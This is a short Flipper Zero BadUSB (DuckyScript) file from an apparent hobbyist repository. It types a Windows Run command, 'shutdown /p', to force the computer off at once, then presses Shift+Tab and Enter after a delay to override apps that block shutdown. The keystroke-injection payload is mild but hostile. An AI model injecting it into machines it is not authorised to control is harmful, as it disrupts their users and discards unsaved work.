Flipper/BadUSB/emptythevoid-BadUSB/windows_helpers/shutdown_commandline.txt
2024-09-06 13:27:37 -07:00

13 lines
173 B
Plaintext

DELAY 500
GUI R
DELAY 500
REM STRING shutdown /s /t 0
STRING shutdown /p
DELAY 100
ENTER
REM Handle apps preventing computer from shutting down
DELAY 20000
SHIFT TAB
ENTER